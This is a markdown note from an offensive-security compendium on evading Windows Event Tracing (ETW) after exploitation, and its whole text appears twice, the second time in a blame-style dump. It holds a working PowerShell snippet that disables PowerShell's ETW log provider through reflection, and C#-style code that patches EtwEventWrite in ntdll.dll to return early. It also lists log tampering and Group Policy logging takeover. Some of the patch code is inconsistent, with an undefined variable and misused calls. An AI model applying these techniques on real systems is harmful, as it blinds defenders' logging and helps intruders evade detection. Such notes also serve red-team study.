killchain-compendium/Post Exploitation/Windows/Evade Event Tracing.md

# Evade Event Tracing (ETW)

* Event Logging
* Trace Logging
* Event IDs are used
* __Event Provider__ generate events
    * Managed Object Format, enabled by a single trace session
    * Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
    * Manifest Based, up to 8 trace sessions
    * TraceLogging, up to 8 trace sessions
* __Event Controller__ build and configure sessions for events
* __Event Consumer__ interpret events, parses sessions of selected providers
* XML data

## Log Evasion

* Deleting logs is tracked by an event ID as well . Do not do it!
    * ID 1102, security audit logs cleared
    * ID 104, log file cleared
    * ID 1100, even service shut down

### Techniques

* Provider
    * [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
        * Set `m_enabled` to `$null` via powershell script

```sh
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```

    * Group policy takeover
        * Loaded in the same security context as the user
        * GPO providers are script block logging and module logging
        * Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
        * Administrative Templates -> Windows Components -> Windows PowerShell
    * Log pipeline abuse
        * `LogPipelineExecutionDetails` has to be set to false
    * Type creation
*  Controller
    * Patching EtwEventWrite stored in `ntdll.dll` via return value modification

```sh
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
```

        * Modify memory permissions

```c
uint oldProtect;
Win32.VirtualProtect(
	etwFunction, 
	(UIntPtr)patch.Length, 
	0x40, 
	out oldProtect
);
```

        * Copy via `Marshal.Copy`

```c
patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
	patch, 
	0, 
	etwEventSend, 
	patch.Length
);
```

        * Clean up

```c
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
```

        * Check patched instruction

```c
Win32.FlushInstructionCache(
	etwFunction,
	NULL
);
```

    * Runtime Trace Tampering
* Consumer
    * Log smashing
    * Log tampering
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Evade Event Tracing (ETW)`

			`* Event Logging`
			`* Trace Logging`
			`* Event IDs are used`
			`* __Event Provider__ generate events`
			`* Managed Object Format, enabled by a single trace session`
			`* Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session`
			`* Manifest Based, up to 8 trace sessions`
			`* TraceLogging, up to 8 trace sessions`
			`* __Event Controller__ build and configure sessions for events`
			`* __Event Consumer__ interpret events, parses sessions of selected providers`
			`* XML data`

			`## Log Evasion`

			`* Deleting logs is tracked by an event ID as well . Do not do it!`
			`* ID 1102, security audit logs cleared`
			`* ID 104, log file cleared`
			`* ID 1100, even service shut down`

			`### Techniques`

			`* Provider`
			`* [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly`
			* Set `m_enabled` to `$null` via powershell script

			```sh
			`$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')`
			`$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)`
			`[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);`
			```

			`* Group policy takeover`
			`* Loaded in the same security context as the user`
			`* GPO providers are script block logging and module logging`
			* Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
			`* Administrative Templates -> Windows Components -> Windows PowerShell`
			`* Log pipeline abuse`
			* `LogPipelineExecutionDetails` has to be set to false
			`* Type creation`
			`* Controller`
			* Patching EtwEventWrite stored in `ntdll.dll` via return value modification

			```sh
			`var ntdll = Win32.LoadLibrary("ntdll.dll");`
			`var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");`
			```

			`* Modify memory permissions`

			```c
			`uint oldProtect;`
			`Win32.VirtualProtect(`
			`etwFunction,`
			`(UIntPtr)patch.Length,`
			`0x40,`
			`out oldProtect`
			`);`
			```

			* Copy via `Marshal.Copy`

			```c
			`patch(new byte[] { 0xc2, 0x14, 0x00 });`
			`Marshal.Copy(`
			`patch,`
			`0,`
			`etwEventSend,`
			`patch.Length`
			`);`
			```

			`* Clean up`

			```c
			`VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);`
			```

			`* Check patched instruction`

			```c
			`Win32.FlushInstructionCache(`
			`etwFunction,`
			`NULL`
			`);`
			```

			`* Runtime Trace Tampering`
			`* Consumer`
			`* Log smashing`
			`* Log tampering`